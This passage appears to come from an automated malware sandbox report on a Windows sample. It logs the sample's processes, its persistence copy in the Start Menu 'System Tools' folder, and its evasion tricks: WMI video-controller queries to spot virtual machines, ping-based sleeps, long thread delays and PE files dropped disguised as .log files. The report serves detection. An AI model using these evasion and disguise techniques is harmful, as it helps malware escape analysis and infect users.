                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Uses ping.exe to sleep
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Users\user\Desktop\teh76E2k50.exeMemory allocated: 12E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeMemory allocated: 1AFE0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeMemory allocated: 1200000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeMemory allocated: 1ABE0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeMemory allocated: B90000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeMemory allocated: 1A9F0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeMemory allocated: 1400000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeMemory allocated: 1B120000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeMemory allocated: 11E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeMemory allocated: 1AD10000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeMemory allocated: CF0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeMemory allocated: 1A6B0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeMemory allocated: 2B30000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeMemory allocated: 1ABC0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeMemory allocated: 16D0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeMemory allocated: 1B280000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeMemory allocated: 17A0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeMemory allocated: 1B3E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeMemory allocated: D20000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeMemory allocated: 1A880000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\teh76E2k50.exeCode function: 0_2_00007FF848C031F2 rdtsc 0_2_00007FF848C031F2
                            Source: C:\Users\user\Desktop\teh76E2k50.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\uztGBGQb.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\DUVDVzTj.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\njoWmzRS.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\NGhBOsDn.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\dHXpSOOR.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\RIKKhLUb.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\YZpakwNq.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\eSpQDyfl.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\DVEbprGR.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\LBCkjtUW.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\bFkGxfJW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\RjktmRtH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\vVgeAcHF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\WqOKhwod.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZYWXQKba.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\cITPDfAk.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\lZLXuWSy.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\jEwQkWoc.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\cZaiSBtn.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\jaGPEhSy.logJump to dropped file
